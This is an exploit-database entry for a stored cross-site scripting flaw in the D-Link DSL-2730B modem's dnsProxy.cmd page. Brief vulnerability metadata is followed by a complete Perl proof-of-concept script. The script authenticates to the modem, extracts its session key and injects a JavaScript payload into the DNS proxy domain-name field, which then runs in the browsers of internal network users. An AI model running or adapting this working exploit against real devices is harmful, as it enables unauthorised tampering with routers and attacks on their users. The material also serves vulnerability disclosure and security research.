D-Link DSL-2730B Modem dnsProxy.cmd Exploit XSS Injection Stored

vendor:

DSL-2730B

by:

Mauricio Correa

7.5

CVSS

HIGH

Cross Site Scripting (XSS Injection)

CWE

Product Name: DSL-2730B

Affected Version From: GE 1.01

Affected Version To: GE 1.01

Patch Exists: NO

Related CWE: N/A

CPE: dlink:dsl-2730b:c1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 8 and Linux

2015

D-Link DSL-2730B Modem dnsProxy.cmd Exploit XSS Injection Stored

This exploit enables some features of the modem, forcing the administrator of the device, accessing the page to reconfigure the modem again, occurring script execution in the browser of internal network users.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

# Exploit Title: D-Link DSL-2730B Modem dnsProxy.cmd Exploit XSS Injection Stored
# Date: 11-01-2015
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.dlink.com
# Hardware version: C1
# Version: GE 1.01
# Tested on: Windows 8 and Linux


#!/usr/bin/perl
#
# Date dd-mm-aaaa: 11-11-2014
# Exploit for D-Link DSL-2730B
# Cross Site Scripting (XSS Injection) Stored in dnsProxy.cmd
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
# More informations: www.xlabs.com.br/blog/?p=339
#
# CAUTION!
# This exploit enable some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#
 

use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;


                my $ip = $ARGV[0];
                my $user = $ARGV[1];
                my $pass = $ARGV[2];
                          
                $ip = $1 if($ip=~/(.*)\/$/);

                               if (@ARGV != 3){
                                               print "\n";
                                               print "XLabs Information Security www.xlabs.com.br\n";
                                               print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n";
                                               print "Developed by Mauricio Correa\n";
                                               print "Contact: mauricio\@xlabs.com.br\n";
                                               print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";

                               }else{

                                               print "XLabs Information Security www.xlabs.com.br\n";
                                               print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n";
                                               print "Developed by Mauricio Correa\n";
                                               print "Contact: mauricio\@xlabs.com.br\n";
                                               print "[+] Exploring $ip\/ ...\n";

                                               my $payload = "%27;alert(%27XLabsSec%27);\/\/";
                                      
                                               my $ua = new LWP::UserAgent;

                                               my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );


                                               $hdrs->authorization_basic($user, $pass);
                                            
                                               chomp($ip);
                                             

                                               print "[+] Preparing...\n";
                                             

                                               my $url = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=A";
                                         
                                             
                                               my $req = new HTTP::Request("GET",$url,$hdrs);

                                               print "[+] Prepared!\n";
                                            
                                               print "[+] Requesting...\n";
                                            
                                               my $resp = $ua->request($req);

                                               if ($resp->is_success){

                                               print "[+] Successfully Requested!\n";

                                               my $resposta = $resp->as_string;

                                               print "[+] Obtain session key...\n";
                                             
                                               my $token = "";
                                             
                                               if($resposta =~ /sessionKey=(.*)\';/){
                                                               $token = $1;                                     
                                                               print "[+] Session key found: $token\n";
                                               }else{
                                                               print "[-] Session key not found!\n";
                                                               exit;
                                               }

                                            
                                                               print "[+] Preparing exploit...\n";
                                             
                                                               my $url_and_xpl = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=XSS$payload&sessionKey=$token";
                                            
                                                               $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);

                                                               print "[+] Prepared!\n";
                                                            
                                                               print "[+] Exploiting...\n";
                                                             
                                                               my $resp2 = $ua->request($req);
                                                             
                                                            
                                                               if ($resp2->is_success){

                                                               my $resultado = $resp2->as_string;
                                                             
                                                                                                              if(index($resultado, uri_unescape($payload)) != -1){
                                                                                                            
                                                                                                              print "[+] Successfully Exploited!";
 
                                                                                                              }else{
                                                                                                            
                                                                                                              print "[-] Not Exploited!";
                                                                                                            
                                                                                                              }
                                                               }

                                               }else {

                                               print "[-] Ops!\n";
                                               print $resp->message;
                                               }
}